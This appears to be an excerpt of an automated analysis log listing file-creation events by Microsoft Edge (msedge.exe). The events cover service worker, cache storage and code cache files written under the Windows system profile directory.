    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\39336937-69b8-44f3-b3c6-2256654e23aa\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\39336937-69b8-44f3-b3c6-2256654e23aa\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\bc10140ccc487cbf_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\6e5d9fe0a946b57f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\18b18d4f42be9dc9_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4264252590b436ca_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2194ae212bec996c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\be38a6b167a06314_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\1c7c53ae3c59cfe1_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fe39ccdcb766bff9_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c9ea7bef21775c34_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9149d681662a6e39_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7e276c1c0fd04047_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\64ed8a037a2f94fd_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ffcdb4b956c42020_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4cbe4af66b58961c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f4f9c98ed04b5ec4_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\561af5d42344f371_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a67b6886fc3a1533_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f637f397dcea2f5b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2af50681e7e165d7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\33f60a11fe8d3c4d_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\93b41bf2357412b4_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7eff83c904ebbf81_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8b65a96eb9aee0b0_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\6840e7e9b84ec2af_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3629afc6d6acd41e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8d22457d87f44ef8_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\cbec4dd87a69e757_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9856673ea76d0deb_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\72fe09fceb7e3a78_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt~RF1fad02.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\databases
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\79aca4930c963cc4_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\79aca4930c963cc4_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ab1bc50940155da2_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ab1bc50940155da2_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\39336937-69b8-44f3-b3c6-2256654e23aa\51799300f73251f6_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\50d287955aa0db29_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\50d287955aa0db29_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\68cda81435e11c25_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fe8f201a1f9e91cb_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7cf8d65d0897fa22_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\db3679147ce746c5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\3ce7e8903a7fd0b1_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\3ce7e8903a7fd0b1_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\475fac05b3942ef4_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ebc969827e6e78fa_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\475fac05b3942ef4_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\55a83b115fd80ff7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\55a83b115fd80ff7_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4785f2d1eb413294_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4785f2d1eb413294_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\e723cb04fc3eaad0_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\e723cb04fc3eaad0_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2d7dd16c2cd9221e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2d7dd16c2cd9221e_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b29ae22bf7251723_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b29ae22bf7251723_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\cdf823ec88206886_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\cdf823ec88206886_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\217a7ae8a3007b2b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2669096da0ab2fb6_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2669096da0ab2fb6_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\984b0eb72c6da64b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\984b0eb72c6da64b_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\314559faefde062a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\314559faefde062a_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0cfe2fc50d18595c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0cfe2fc50d18595c_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\192386fd3846067f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\192386fd3846067f_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\fbfc2d62749078d1_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\fbfc2d62749078d1_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\dfd4ad20f3e95164_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\dfd4ad20f3e95164_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\d1c87e07019d8b4e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\d1c87e07019d8b4e_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\f7b67dad731ab807_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\f7b67dad731ab807_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\16f4e821b507362b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\16f4e821b507362b_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0b17bb7e9cf5a436_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0b17bb7e9cf5a436_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0f0839cc28cc3d3e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0f0839cc28cc3d3e_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b5b383720128fe63_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b5b383720128fe63_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ec37128008082892_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ec37128008082892_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ee51d1c28e826730_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ee51d1c28e826730_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\96e189d62afbdb94_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\96e189d62afbdb94_1
